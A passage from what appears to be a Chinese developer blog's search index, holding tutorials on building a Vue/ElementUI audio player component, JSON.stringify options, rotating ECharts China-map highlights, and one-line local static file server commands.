\u0026lt;script\u0026gt; export default { data () { return { audio: { // 该字段是音频是否处于播放状态的属性 playing: false } } }, methods: { // 控制音频的播放与暂停 startPlayOrPause () { return this.audio.playing ? this.pause() : this.play() }, // 播放音频 play () { this.$refs.audio.play() }, // 暂停音频 pause () { this.$refs.audio.pause() }, // 当音频播放 onPlay () { this.audio.playing = true }, // 当音频暂停 onPause () { this.audio.playing = false } }, filters: { // 使用组件过滤器来动态改变按钮的显示 transPlayPause(value) { return value ? 
\u0026#39;暂停\u0026#39; : \u0026#39;播放\u0026#39; } } } \u0026lt;/script\u0026gt; \u0026lt;style\u0026gt; \u0026lt;/style\u0026gt; 5.3. 音频显示时间 音频的时间显示主要有两部分,音频的总时长和当前播放时间。可以从两个事件中获取\nloadedmetadata:代表音频的元数据已经被加载完成,可以从中获取音频总时长 timeupdate: 当前播放位置作为正常播放的一部分而改变,或者以特别有趣的方式,例如不连续地改变,可以从该事件中获取音频的当前播放时间,该事件在播放过程中会不断被触发 要点代码:整数格式化成时:分:秒\nfunction realFormatSecond(second) { var secondType = typeof second if (secondType === \u0026#39;number\u0026#39; || secondType === \u0026#39;string\u0026#39;) { second = parseInt(second) var hours = Math.floor(second / 3600) second = second - hours * 3600 var mimute = Math.floor(second / 60) second = second - mimute * 60 return hours + \u0026#39;:\u0026#39; + (\u0026#39;0\u0026#39; + mimute).slice(-2) + \u0026#39;:\u0026#39; + (\u0026#39;0\u0026#39; + second).slice(-2) } else { return \u0026#39;0:00:00\u0026#39; } } 要点代码: 两个事件的处理\n// 当timeupdate事件大概每秒一次,用来更新音频流的当前播放时间 onTimeupdate(res) { console.log(\u0026#39;timeupdate\u0026#39;) console.log(res) this.audio.currentTime = res.target.currentTime }, // 当加载语音流元数据完成后,会触发该事件的回调函数 // 语音元数据主要是语音的长度之类的数据 onLoadedmetadata(res) { console.log(\u0026#39;loadedmetadata\u0026#39;) console.log(res) this.audio.maxTime = parseInt(res.target.duration) } 完整代码\n\u0026lt;template\u0026gt; \u0026lt;div\u0026gt; \u0026lt;!-- 此处的ref属性,可以很方便的在vue组件中通过 this.$refs.audio获取该dom元素 --\u0026gt; \u0026lt;audio ref=\u0026#34;audio\u0026#34; @pause=\u0026#34;onPause\u0026#34; @play=\u0026#34;onPlay\u0026#34; @timeupdate=\u0026#34;onTimeupdate\u0026#34; @loadedmetadata=\u0026#34;onLoadedmetadata\u0026#34; src=\u0026#34;http://devtest.qiniudn.com/secret base~.mp3\u0026#34; controls=\u0026#34;controls\u0026#34;\u0026gt;\u0026lt;/audio\u0026gt; \u0026lt;!-- 音频播放控件 --\u0026gt; \u0026lt;div\u0026gt; \u0026lt;el-button type=\u0026#34;text\u0026#34; @click=\u0026#34;startPlayOrPause\u0026#34;\u0026gt;{{audio.playing | transPlayPause}}\u0026lt;/el-button\u0026gt; \u0026lt;el-tag type=\u0026#34;info\u0026#34;\u0026gt;{{ 
audio.currentTime | formatSecond}}\u0026lt;/el-tag\u0026gt; \u0026lt;el-tag type=\u0026#34;info\u0026#34;\u0026gt;{{ audio.maxTime | formatSecond}}\u0026lt;/el-tag\u0026gt; \u0026lt;/div\u0026gt; \u0026lt;/div\u0026gt; \u0026lt;/template\u0026gt; \u0026lt;script\u0026gt; // 将整数转换成 时:分:秒的格式 function realFormatSecond(second) { var secondType = typeof second if (secondType === \u0026#39;number\u0026#39; || secondType === \u0026#39;string\u0026#39;) { second = parseInt(second) var hours = Math.floor(second / 3600) second = second - hours * 3600 var mimute = Math.floor(second / 60) second = second - mimute * 60 return hours + \u0026#39;:\u0026#39; + (\u0026#39;0\u0026#39; + mimute).slice(-2) + \u0026#39;:\u0026#39; + (\u0026#39;0\u0026#39; + second).slice(-2) } else { return \u0026#39;0:00:00\u0026#39; } } export default { data () { return { audio: { // 该字段是音频是否处于播放状态的属性 playing: false, // 音频当前播放时长 currentTime: 0, // 音频最大播放时长 maxTime: 0 } } }, methods: { // 控制音频的播放与暂停 startPlayOrPause () { return this.audio.playing ? this.pause() : this.play() }, // 播放音频 play () { this.$refs.audio.play() }, // 暂停音频 pause () { this.$refs.audio.pause() }, // 当音频播放 onPlay () { this.audio.playing = true }, // 当音频暂停 onPause () { this.audio.playing = false }, // 当timeupdate事件大概每秒一次,用来更新音频流的当前播放时间 onTimeupdate(res) { console.log(\u0026#39;timeupdate\u0026#39;) console.log(res) this.audio.currentTime = res.target.currentTime }, // 当加载语音流元数据完成后,会触发该事件的回调函数 // 语音元数据主要是语音的长度之类的数据 onLoadedmetadata(res) { console.log(\u0026#39;loadedmetadata\u0026#39;) console.log(res) this.audio.maxTime = parseInt(res.target.duration) } }, filters: { // 使用组件过滤器来动态改变按钮的显示 transPlayPause(value) { return value ? \u0026#39;暂停\u0026#39; : \u0026#39;播放\u0026#39; }, // 将整数转化成时分秒 formatSecond(second = 0) { return realFormatSecond(second) } } } \u0026lt;/script\u0026gt; \u0026lt;style\u0026gt; \u0026lt;/style\u0026gt; 打开浏览器可以看到,当音频播放时,当前时间也在改变。 5.4. 
音频进度条控制 进度条主要有两个控制,改变进度的原理是:改变audio.currentTime属性值\n音频播放后,当前时间改变,进度条就要随之改变 拖动进度条,可以改变音频的当前时间 // 进度条ui \u0026lt;el-slider v-model=\u0026#34;sliderTime\u0026#34; :format-tooltip=\u0026#34;formatProcessToolTip\u0026#34; @change=\u0026#34;changeCurrentTime\u0026#34; class=\u0026#34;slider\u0026#34;\u0026gt;\u0026lt;/el-slider\u0026gt; // 拖动进度条,改变当前时间,index是进度条改变时的回调函数的参数0-100之间,需要换算成实际时间 changeCurrentTime(index) { this.$refs.audio.currentTime = parseInt(index / 100 * this.audio.maxTime) }, // 当音频当前时间改变后,进度条也要改变 onTimeupdate(res) { console.log(\u0026#39;timeupdate\u0026#39;) console.log(res) this.audio.currentTime = res.target.currentTime this.sliderTime = parseInt(this.audio.currentTime / this.audio.maxTime * 100) }, // 进度条格式化toolTip formatProcessToolTip(index = 0) { index = parseInt(this.audio.maxTime / 100 * index) return \u0026#39;进度条: \u0026#39; + realFormatSecond(index) }, 5.5. 音频音量控制 音频的音量控制和进度控制差不多,也是通过拖动滑动条,去修改audio.volume属性值,该属性代表音量的大小,取值范围是0 - 1,用滑动条的时候,也是需要换算一下值,此处不再啰嗦\n5.6. 音频播放速度控制 音频播放速度控制和进度控制差不多,也是点击按钮,去修改audio.playbackRate属性值,该属性代表播放速度的倍率,此处不再啰嗦\n5.7. 音频静音控制 静音的控制是点击按钮,去修改audio.muted属性,该属性有两个值: true(静音),false(不静音)。 注意,静音的时候,音频的进度条还是会继续往前走的。\n5.8. 音频下载控制 音频下载是一个a链接,记得加上download属性,不然浏览器会在新标签打开音频,而不是下载音频\n\u0026lt;a :href=\u0026#34;url\u0026#34; v-show=\u0026#34;!controlList.noDownload\u0026#34; target=\u0026#34;_blank\u0026#34; class=\u0026#34;download\u0026#34; download\u0026gt;下载\u0026lt;/a\u0026gt; 5.9. 
个性化配置 音频的个性化配置有很多,大家可以自己扩展,通过父组件传递响应的值,可以做到个性化设置。\ncontrolList: { // 不显示下载 noDownload: false, // 不显示静音 noMuted: false, // 不显示音量条 noVolume: false, // 不显示进度条 noProcess: false, // 只能播放一个 onlyOnePlaying: false, // 不要快进按钮 noSpeed: false } setControlList () { let controlList = this.theControlList.split(\u0026#39; \u0026#39;) controlList.forEach((item) =\u0026gt; { if(this.controlList[item] !== undefined){ this.controlList[item] = true } }) }, 例如父组件这样\n\u0026lt;template\u0026gt; \u0026lt;div id=\u0026#34;app\u0026#34;\u0026gt; \u0026lt;div v-for=\u0026#34;item in audios\u0026#34; :key=\u0026#34;item.url\u0026#34;\u0026gt; \u0026lt;VueAudio :theUrl=\u0026#34;item.url\u0026#34; :theControlList=\u0026#34;item.controlList\u0026#34;/\u0026gt; \u0026lt;/div\u0026gt; \u0026lt;/div\u0026gt; \u0026lt;/template\u0026gt; \u0026lt;script\u0026gt; import VueAudio from \u0026#39;./components/VueAudio\u0026#39; export default { name: \u0026#39;app\u0026#39;, components: { VueAudio }, data () { return { audios: [ { url: \u0026#39;http://devtest.qiniudn.com/secret base~.mp3\u0026#39;, controlList: \u0026#39;onlyOnePlaying\u0026#39; }, { url: \u0026#39;http://devtest.qiniudn.com/回レ!雪月花.mp3\u0026#39;, controlList: \u0026#39;noDownload noMuted onlyOnePlaying\u0026#39; },{ url: \u0026#39;http://devtest.qiniudn.com/あっちゅ~ま青春!.mp3\u0026#39;, controlList: \u0026#39;noDownload noVolume noMuted onlyOnePlaying\u0026#39; },{ url: \u0026#39;http://devtest.qiniudn.com/Preparation.mp3\u0026#39;, controlList: \u0026#39;noDownload noSpeed onlyOnePlaying\u0026#39; } ] } } } \u0026lt;/script\u0026gt; \u0026lt;style\u0026gt; \u0026lt;/style\u0026gt; 5.10. 
一点点ES6语法 大多数时候,我们希望页面上播放一个音频时,其他音频可以暂停。 [...audios]可以把一个类数组转化成数组,这个是我常用的。\nonPlay (res) { console.log(res) this.audio.playing = true this.audio.loading = false if(!this.controlList.onlyOnePlaying){ return } let target = res.target let audios = document.getElementsByTagName(\u0026#39;audio\u0026#39;); // 如果设置了排他性,当前音频播放是,其他音频都要暂停 [...audios].forEach((item) =\u0026gt; { if(item !== target){ item.pause() } }) }, 5.11. 完成后的文件 //filename: VueAudio.vue \u0026lt;template\u0026gt; \u0026lt;div class=\u0026#34;di main-wrap\u0026#34; v-loading=\u0026#34;audio.waiting\u0026#34;\u0026gt; \u0026lt;!-- 这里设置了ref属性后,在vue组件中,就可以用this.$refs.audio来访问该dom元素 --\u0026gt; \u0026lt;audio ref=\u0026#34;audio\u0026#34; class=\u0026#34;dn\u0026#34; :src=\u0026#34;url\u0026#34; :preload=\u0026#34;audio.preload\u0026#34; @play=\u0026#34;onPlay\u0026#34; @error=\u0026#34;onError\u0026#34; @waiting=\u0026#34;onWaiting\u0026#34; @pause=\u0026#34;onPause\u0026#34; @timeupdate=\u0026#34;onTimeupdate\u0026#34; @loadedmetadata=\u0026#34;onLoadedmetadata\u0026#34; \u0026gt;\u0026lt;/audio\u0026gt; \u0026lt;div\u0026gt; \u0026lt;el-button type=\u0026#34;text\u0026#34; @click=\u0026#34;startPlayOrPause\u0026#34;\u0026gt;{{audio.playing | transPlayPause}}\u0026lt;/el-button\u0026gt; \u0026lt;el-button v-show=\u0026#34;!controlList.noSpeed\u0026#34; type=\u0026#34;text\u0026#34; @click=\u0026#34;changeSpeed\u0026#34;\u0026gt;{{audio.speed | transSpeed}}\u0026lt;/el-button\u0026gt; \u0026lt;el-tag type=\u0026#34;info\u0026#34;\u0026gt;{{ audio.currentTime | formatSecond}}\u0026lt;/el-tag\u0026gt; \u0026lt;el-slider v-show=\u0026#34;!controlList.noProcess\u0026#34; v-model=\u0026#34;sliderTime\u0026#34; :format-tooltip=\u0026#34;formatProcessToolTip\u0026#34; @change=\u0026#34;changeCurrentTime\u0026#34; class=\u0026#34;slider\u0026#34;\u0026gt;\u0026lt;/el-slider\u0026gt; \u0026lt;el-tag type=\u0026#34;info\u0026#34;\u0026gt;{{ audio.maxTime | formatSecond }}\u0026lt;/el-tag\u0026gt; \u0026lt;el-button 
v-show=\u0026#34;!controlList.noMuted\u0026#34; type=\u0026#34;text\u0026#34; @click=\u0026#34;startMutedOrNot\u0026#34;\u0026gt;{{audio.muted | transMutedOrNot}}\u0026lt;/el-button\u0026gt; \u0026lt;el-slider v-show=\u0026#34;!controlList.noVolume\u0026#34; v-model=\u0026#34;volume\u0026#34; :format-tooltip=\u0026#34;formatVolumeToolTip\u0026#34; @change=\u0026#34;changeVolume\u0026#34; class=\u0026#34;slider\u0026#34;\u0026gt;\u0026lt;/el-slider\u0026gt; \u0026lt;a :href=\u0026#34;url\u0026#34; v-show=\u0026#34;!controlList.noDownload\u0026#34; target=\u0026#34;_blank\u0026#34; class=\u0026#34;download\u0026#34; download\u0026gt;下载\u0026lt;/a\u0026gt; \u0026lt;/div\u0026gt; \u0026lt;/div\u0026gt; \u0026lt;/template\u0026gt; \u0026lt;script\u0026gt; function realFormatSecond(second) { var secondType = typeof second if (secondType === \u0026#39;number\u0026#39; || secondType === \u0026#39;string\u0026#39;) { second = parseInt(second) var hours = Math.floor(second / 3600) second = second - hours * 3600 var mimute = Math.floor(second / 60) second = second - mimute * 60 return hours + \u0026#39;:\u0026#39; + (\u0026#39;0\u0026#39; + mimute).slice(-2) + \u0026#39;:\u0026#39; + (\u0026#39;0\u0026#39; + second).slice(-2) } else { return \u0026#39;0:00:00\u0026#39; } } export default { props: { theUrl: { type: String, required: true, }, theSpeeds: { type: Array, default () { return [1, 1.5, 2] } }, theControlList: { type: String, default: \u0026#39;\u0026#39; } }, name: \u0026#39;VueAudio\u0026#39;, data() { return { url: this.theUrl || \u0026#39;http://devtest.qiniudn.com/secret base~.mp3\u0026#39;, audio: { currentTime: 0, maxTime: 0, playing: false, muted: false, speed: 1, waiting: true, preload: \u0026#39;auto\u0026#39; }, sliderTime: 0, volume: 100, speeds: this.theSpeeds, controlList: { // 不显示下载 noDownload: false, // 不显示静音 noMuted: false, // 不显示音量条 noVolume: false, // 不显示进度条 noProcess: false, // 只能播放一个 onlyOnePlaying: false, // 不要快进按钮 noSpeed: false } } }, methods: 
{ setControlList () { let controlList = this.theControlList.split(\u0026#39; \u0026#39;) controlList.forEach((item) =\u0026gt; { if(this.controlList[item] !== undefined){ this.controlList[item] = true } }) }, changeSpeed() { let index = this.speeds.indexOf(this.audio.speed) + 1 this.audio.speed = this.speeds[index % this.speeds.length] this.$refs.audio.playbackRate = this.audio.speed }, startMutedOrNot() { this.$refs.audio.muted = !this.$refs.audio.muted this.audio.muted = this.$refs.audio.muted }, // 音量条toolTip formatVolumeToolTip(index) { return \u0026#39;音量条: \u0026#39; + index }, // 进度条toolTip formatProcessToolTip(index = 0) { index = parseInt(this.audio.maxTime / 100 * index) return \u0026#39;进度条: \u0026#39; + realFormatSecond(index) }, // 音量改变 changeVolume(index = 0) { this.$refs.audio.volume = index / 100 this.volume = index }, // 播放跳转 changeCurrentTime(index) { this.$refs.audio.currentTime = parseInt(index / 100 * this.audio.maxTime) }, startPlayOrPause() { return this.audio.playing ? 
this.pausePlay() : this.startPlay() }, // 开始播放 startPlay() { this.$refs.audio.play() }, // 暂停 pausePlay() { this.$refs.audio.pause() }, // 当音频暂停 onPause () { this.audio.playing = false }, // 当发生错误, 就出现loading状态 onError () { this.audio.waiting = true }, // 当音频开始等待 onWaiting (res) { console.log(res) }, // 当音频开始播放 onPlay (res) { console.log(res) this.audio.playing = true this.audio.loading = false if(!this.controlList.onlyOnePlaying){ return } let target = res.target let audios = document.getElementsByTagName(\u0026#39;audio\u0026#39;); [...audios].forEach((item) =\u0026gt; { if(item !== target){ item.pause() } }) }, // 当timeupdate事件大概每秒一次,用来更新音频流的当前播放时间 onTimeupdate(res) { // console.log(\u0026#39;timeupdate\u0026#39;) // console.log(res) this.audio.currentTime = res.target.currentTime this.sliderTime = parseInt(this.audio.currentTime / this.audio.maxTime * 100) }, // 当加载语音流元数据完成后,会触发该事件的回调函数 // 语音元数据主要是语音的长度之类的数据 onLoadedmetadata(res) { console.log(\u0026#39;loadedmetadata\u0026#39;) console.log(res) this.audio.waiting = false this.audio.maxTime = parseInt(res.target.duration) } }, filters: { formatSecond(second = 0) { return realFormatSecond(second) }, transPlayPause(value) { return value ? \u0026#39;暂停\u0026#39; : \u0026#39;播放\u0026#39; }, transMutedOrNot(value) { return value ? \u0026#39;放音\u0026#39; : \u0026#39;静音\u0026#39; }, transSpeed(value) { return \u0026#39;快进: x\u0026#39; + value } }, created() { this.setControlList() } } \u0026lt;/script\u0026gt; \u0026lt;!-- Add \u0026#34;scoped\u0026#34; attribute to limit CSS to this component only --\u0026gt; \u0026lt;style scoped\u0026gt; .main-wrap{ padding: 10px 15px; } .slider { display: inline-block; width: 100px; position: relative; top: 14px; margin-left: 15px; } .di { display: inline-block; } .download { color: #409EFF; margin-left: 15px; } .dn{ display: none; } \u0026lt;/style\u0026gt; 6. 
感谢 如果你需要一个小型的vue音乐播放器,你可以试试vue-aplayer, 该播放器不仅仅支持vue组件,非Vue的也支持,你可以看看他们的demo\n","permalink":"https://wdd.js.org/posts/2018/02/vue-elementui-audio-component/","summary":"1. 简介 1.1. 相关技术 Vue Vue-cli ElementUI yarn (之前我用npm, 并使用cnpm的源,但是用了yarn之后,我发现它比cnpm的速度还快,功能更好,我就毫不犹豫选择yarn了) Audio相关API和事件 1.2. 从本教程你会学到什么? Vue单文件组件开发知识 Element UI基本用法 Audio原生API及Audio相关事件 音频播放器的基本原理 音频的播放暂停控制 更新音频显示时间 音频进度条控制与跳转 音频音量控制 音频播放速度控制 音频静音控制 音频下载控制 个性化配置与排他性播放 一点点ES6语法 2. 学前准备 基本上不需要什么准备,但是如果你能先看一下Aduio相关API和事件将会更好\nAudio: 如果你愿意一层一层剥开我的心 使用 HTML5 音频和视频 3. 在线demon 没有在线demo的教程都是耍流氓\n查看在线demon 项目地址 4. 开始编码 5. 项目初始化 ➜ test vue init webpack element-audio A newer version of vue-cli is available. latest: 2.9.2 installed: 2.9.1 ? Project name element-audio ? Project description A Vue.js project ?","title":"Vue+ElementUI 手把手教你做一个audio组件"},{"content":"1. 语法 JSON.stringify(value[, replacer[, space]]) 一般用法:\nvar user = {name: \u0026#39;andy\u0026#39;, isDead: false, age: 11, addr: \u0026#39;shanghai\u0026#39;}; JSON.stringify(user); \u0026#34;{\u0026#34;name\u0026#34;:\u0026#34;andy\u0026#34;,\u0026#34;isDead\u0026#34;:false,\u0026#34;age\u0026#34;:11,\u0026#34;addr\u0026#34;:\u0026#34;shanghai\u0026#34;}\u0026#34; 2. 扩展用法 2.1. replacer replacer可以是函数或者是数组。\n功能1: 改变属性值 将isDead属性的值翻译成0或1,0对应false,1对应true\nvar user = {name: \u0026#39;andy\u0026#39;, isDead: false, age: 11, addr: \u0026#39;shanghai\u0026#39;}; JSON.stringify(user, function(key, value){ if(key === \u0026#39;isDead\u0026#39;){ return value === true ? 
1 : 0; } return value; }); \u0026#34;{\u0026#34;name\u0026#34;:\u0026#34;andy\u0026#34;,\u0026#34;isDead\u0026#34;:0,\u0026#34;age\u0026#34;:11,\u0026#34;addr\u0026#34;:\u0026#34;shanghai\u0026#34;}\u0026#34; 功能2:删除某个属性 将isDead属性删除,如果replacer的返回值是undefined,那么该属性会被删除。\nvar user = {name: \u0026#39;andy\u0026#39;, isDead: false, age: 11, addr: \u0026#39;shanghai\u0026#39;}; JSON.stringify(user, function(key, value){ if(key === \u0026#39;isDead\u0026#39;){ return undefined; } return value; }); \u0026#34;{\u0026#34;name\u0026#34;:\u0026#34;andy\u0026#34;,\u0026#34;age\u0026#34;:11,\u0026#34;addr\u0026#34;:\u0026#34;shanghai\u0026#34;}\u0026#34; 功能3: 通过数组过滤某些属性 只需要name属性和addr属性,其他不要。\nvar user = {name: \u0026#39;andy\u0026#39;, isDead: false, age: 11, addr: \u0026#39;shanghai\u0026#39;}; JSON.stringify(user, [\u0026#39;name\u0026#39;, \u0026#39;addr\u0026#39;]); \u0026#34;{\u0026#34;name\u0026#34;:\u0026#34;andy\u0026#34;,\u0026#34;addr\u0026#34;:\u0026#34;shanghai\u0026#34;}\u0026#34; 2.2. space space可以是数字或者是字符串, 如果是数字则表示属性名前加上空格符号的数量,如果是字符串,则直接在属性名前加上该字符串。\n功能1: 给输出属性前加上n个空格\nvar user = {name: \u0026#39;andy\u0026#39;, isDead: false, age: 11, addr: \u0026#39;shanghai\u0026#39;}; JSON.stringify(user, null, 4); \u0026#34;{ \u0026#34;name\u0026#34;: \u0026#34;andy\u0026#34;, \u0026#34;isDead\u0026#34;: false, \u0026#34;age\u0026#34;: 11, \u0026#34;addr\u0026#34;: \u0026#34;shanghai\u0026#34; }\u0026#34; 功能2: tab格式化输出\nvar user = {name: \u0026#39;andy\u0026#39;, isDead: false, age: 11, addr: \u0026#39;shanghai\u0026#39;}; JSON.stringify(user, null, \u0026#39;\\t\u0026#39;); \u0026#34;{ \u0026#34;name\u0026#34;: \u0026#34;andy\u0026#34;, \u0026#34;isDead\u0026#34;: false, \u0026#34;age\u0026#34;: 11, \u0026#34;addr\u0026#34;: \u0026#34;shanghai\u0026#34; }\u0026#34; 功能3: 搞笑\nJSON.stringify(user, null, \u0026#39;good\u0026#39;); \u0026#34;{ good\u0026#34;name\u0026#34;: \u0026#34;andy\u0026#34;, good\u0026#34;isDead\u0026#34;: false, good\u0026#34;age\u0026#34;: 11, 
good\u0026#34;addr\u0026#34;: \u0026#34;shanghai\u0026#34; }\u0026#34; 2.3. 深拷贝 var user = {name: \u0026#39;andy\u0026#39;, isDead: false, age: 11, addr: \u0026#39;shanghai\u0026#39;}; var temp = JSON.stringify(user); var user2 = JSON.parse(temp); 3. 其他 JSON.parse() 其实也是支持第二个参数的。功能类似于JSON.stringify的第二个参数的功能。\n4. 参考 MDN JSON.stringify() ","permalink":"https://wdd.js.org/posts/2018/02/json-stringify-powerful/","summary":"1. 语法 JSON.stringify(value[, replacer[, space]]) 一般用法:\nvar user = {name: \u0026#39;andy\u0026#39;, isDead: false, age: 11, addr: \u0026#39;shanghai\u0026#39;}; JSON.stringify(user); \u0026#34;{\u0026#34;name\u0026#34;:\u0026#34;andy\u0026#34;,\u0026#34;isDead\u0026#34;:false,\u0026#34;age\u0026#34;:11,\u0026#34;addr\u0026#34;:\u0026#34;shanghai\u0026#34;}\u0026#34; 2. 扩展用法 2.1. replacer replacer可以是函数或者是数组。\n功能1: 改变属性值 将isDead属性的值翻译成0或1,0对应false,1对应true\nvar user = {name: \u0026#39;andy\u0026#39;, isDead: false, age: 11, addr: \u0026#39;shanghai\u0026#39;}; JSON.stringify(user, function(key, value){ if(key === \u0026#39;isDead\u0026#39;){ return value === true ? 1 : 0; } return value; }); \u0026#34;{\u0026#34;name\u0026#34;:\u0026#34;andy\u0026#34;,\u0026#34;isDead\u0026#34;:0,\u0026#34;age\u0026#34;:11,\u0026#34;addr\u0026#34;:\u0026#34;shanghai\u0026#34;}\u0026#34; 功能2:删除某个属性 将isDead属性删除,如果replacer的返回值是undefined,那么该属性会被删除。\nvar user = {name: \u0026#39;andy\u0026#39;, isDead: false, age: 11, addr: \u0026#39;shanghai\u0026#39;}; JSON.","title":"你不知道的JSON.stringify()妙用"},{"content":"1. 
小栗子 最早我是想通过dispatchAction方法去改变选中的省份,但是没有起作用,如果你知道这个方法怎么实现,麻烦你可以告诉我。 我实现的方法是另外一种。\ndispatchAction({ type: \u0026#39;geoSelect\u0026#39;, // 可选,系列 index,可以是一个数组指定多个系列 seriesIndex?: number|Array, // 可选,系列名称,可以是一个数组指定多个系列 seriesName?: string|Array, // 数据的 index,如果不指定也可以通过 name 属性根据名称指定数据 dataIndex?: number, // 可选,数据名称,在有 dataIndex 的时候忽略 name?: string }) 后来我换了一种方法。这个方法的核心思路是定时获取图表的配置,然后更新配置,最后再设置配置。\nvar myChart = echarts.init(document.getElementById(\u0026#39;china-map\u0026#39;)); var COLORS = [\u0026#34;#070093\u0026#34;, \u0026#34;#1c3fbf\u0026#34;, \u0026#34;#1482e5\u0026#34;, \u0026#34;#70b4eb\u0026#34;, \u0026#34;#b4e0f3\u0026#34;, \u0026#34;#ffffff\u0026#34;]; // 指定图表的配置项和数据 var option = { tooltip: { trigger: \u0026#39;item\u0026#39;, formatter: \u0026#39;{b}\u0026#39; }, series: [ { name: \u0026#39;中国\u0026#39;, type: \u0026#39;map\u0026#39;, mapType: \u0026#39;china\u0026#39;, selectedMode : \u0026#39;single\u0026#39;, label: { normal: { show: true }, emphasis: { show: true } }, data:[ // 默认高亮安徽省 {name:\u0026#39;安徽\u0026#39;, selected:true} ], itemStyle: { normal: { areaColor: \u0026#39;rgba(255,255,255,0.5)\u0026#39;, color: \u0026#39;#000000\u0026#39;, shadowBlur: 200, shadowColor: \u0026#39;rgba(0, 0, 0, 0.5)\u0026#39; }, emphasis:{ areaColor: \u0026#39;#3be2fb\u0026#39;, color: \u0026#39;#000000\u0026#39;, shadowBlur: 200, shadowColor: \u0026#39;rgba(0, 0, 0, 0.5)\u0026#39; } } } ] }; // 使用刚指定的配置项和数据显示图表。 myChart.setOption(option); myChart.on(\u0026#39;click\u0026#39;, function(params) { console.log(params); }); setInterval(function(){ var op = myChart.getOption(); var data = op.series[0].data; var length = data.length; data.some(function(item, index){ if(item.selected){ item.selected = false; var next = (index + 1)%length; data[next].selected = true; return true; } }); myChart.setOption(op); }, 3000); 2. 
后续补充 我从这里发现:https://github.com/ecomfe/echarts/issues/3282,选中地图的写法是这样的,我试了一下果然可以。主要是type要是mapSelect,而不是geoSelect\nmyChart.dispatchAction({ type: \u0026#39;mapSelect\u0026#39;, // 可选,系列 index,可以是一个数组指定多个系列 // seriesIndex: 0, // 可选,系列名称,可以是一个数组指定多个系列 // seriesName: string|Array, // 数据的 index,如果不指定也可以通过 name 属性根据名称指定数据 // dataIndex: number, // 可选,数据名称,在有 dataIndex 的时候忽略 name: \u0026#39;河北\u0026#39; }); 3. 哪里去下载中国地图? 官方示例里是没有中国地图的,不过你可以去github的官方仓库里找。地址是:https://github.com/apache/incubator-echarts/tree/master/map\n4. 地图学习的栗子哪里有? 4.1. 先学习一下美国地图怎么玩吧 echarts官方文档上有美国地图的实例,地址:http://echarts.baidu.com/examples/editor.html?c=map-usa\n4.2. 我国地图也是有的,参考iphone销量这个栗子 地址:http://echarts.baidu.com/option.html#series-map, 注意:地图的相关文档在series-\u0026gt;type:map中\n","permalink":"https://wdd.js.org/posts/2018/02/echarts-highlight-china-map/","summary":"1. 小栗子 最早我是想通过dispatchAction方法去改变选中的省份,但是没有起作用,如果你知道这个方法怎么实现,麻烦你可以告诉我。 我实现的方法是另外一种。\ndispatchAction({ type: \u0026#39;geoSelect\u0026#39;, // 可选,系列 index,可以是一个数组指定多个系列 seriesIndex?: number|Array, // 可选,系列名称,可以是一个数组指定多个系列 seriesName?: string|Array, // 数据的 index,如果不指定也可以通过 name 属性根据名称指定数据 dataIndex?: number, // 可选,数据名称,在有 dataIndex 的时候忽略 name?: string }) 后来我换了一种方法。这个方法的核心思路是定时获取图表的配置,然后更新配置,最后再设置配置。\nvar myChart = echarts.init(document.getElementById(\u0026#39;china-map\u0026#39;)); var COLORS = [\u0026#34;#070093\u0026#34;, \u0026#34;#1c3fbf\u0026#34;, \u0026#34;#1482e5\u0026#34;, \u0026#34;#70b4eb\u0026#34;, \u0026#34;#b4e0f3\u0026#34;, \u0026#34;#ffffff\u0026#34;]; // 指定图表的配置项和数据 var option = { tooltip: { trigger: \u0026#39;item\u0026#39;, formatter: \u0026#39;{b}\u0026#39; }, series: [ { name: \u0026#39;中国\u0026#39;, type: \u0026#39;map\u0026#39;, mapType: \u0026#39;china\u0026#39;, selectedMode : \u0026#39;single\u0026#39;, label: { normal: { show: true }, emphasis: { show: true } }, data:[ // 默认高亮安徽省 {name:\u0026#39;安徽\u0026#39;, selected:true} ], itemStyle: { normal: { areaColor: \u0026#39;rgba(255,255,255,0.","title":"ECharts 
轮流高亮中国地图各个省份"},{"content":"简易服务器:在命令执行的所在路径启动一个http服务器,然后你可以通过浏览器访问该路径下的所有文件。\n在局域网内传文件,或者自己测试使用都是非常方便的。\n1. 基于python 1.1. 基于Python2 python -m SimpleHTTPServer port\n\u0026gt; python -m SimpleHTTPServer 8099 Serving HTTP on 0.0.0.0 port 8099 ... 127.0.0.1 - - [24/Oct/2017 11:07:56] \u0026#34;GET / HTTP/1.1\u0026#34; 200 - 1.2. 基于python3 python3 -m http.server port\n\u0026gt; python3 -m http.server 8099 Serving HTTP on 0.0.0.0 port 8099 (http://0.0.0.0:8099/) ... 127.0.0.1 - - [24/Oct/2017 11:05:06] \u0026#34;GET / HTTP/1.1\u0026#34; 200 - 127.0.0.1 - - [24/Oct/2017 11:05:06] code 404, message File not found 127.0.0.1 - - [24/Oct/2017 11:05:06] \u0026#34;GET /favicon.ico HTTP/1.1\u0026#34; 404 - 2. 基于nodejs 首先你要安装nodejs 2.1. http-server // 安装 npm install http-server -g // 用法 http-server [path] [options] 2.2. serve // 安装 npm install -g serve // 用法 serve [options] \u0026lt;path\u0026gt; 2.3. webpack-dev-server // 安装 npm install webpack-dev-server -g // 用法 webpack-dev-server 2.4. anywhere // 安装 npm install -g anywhere // 用法 anywhere anywhere -p port 2.5. puer // 安装 npm -g install puer // 使用 puer - 提供一个当前或指定路径的静态服务器 - 所有浏览器的实时刷新:编辑css实时更新(update)页面样式,其它文件则重载(reload)页面 - 提供简单熟悉的mock请求的配置功能,并且配置也是自动更新。 - 可用作代理服务器,调试开发既有服务器的页面,可与mock功能配合使用 - 集成了weinre,并提供二维码地址,方便移动端的调试 - 可以作为connect中间件使用(前提是后端为nodejs,否则请使用代理模式) ","permalink":"https://wdd.js.org/posts/2018/02/one-command-create-static-file-server/","summary":"简易服务器:在命令执行的所在路径启动一个http服务器,然后你可以通过浏览器访问该路径下的所有文件。\n在局域网内传文件,或者自己测试使用都是非常方便的。\n1. 基于python 1.1. 基于Python2 python -m SimpleHTTPServer port\n\u0026gt; python -m SimpleHTTPServer 8099 Serving HTTP on 0.0.0.0 port 8099 ... 127.0.0.1 - - [24/Oct/2017 11:07:56] \u0026#34;GET / HTTP/1.1\u0026#34; 200 - 1.2. 基于python3 python3 -m http.server port\n\u0026gt; python3 -m http.server 8099 Serving HTTP on 0.0.0.0 port 8099 (http://0.0.0.0:8099/) ... 
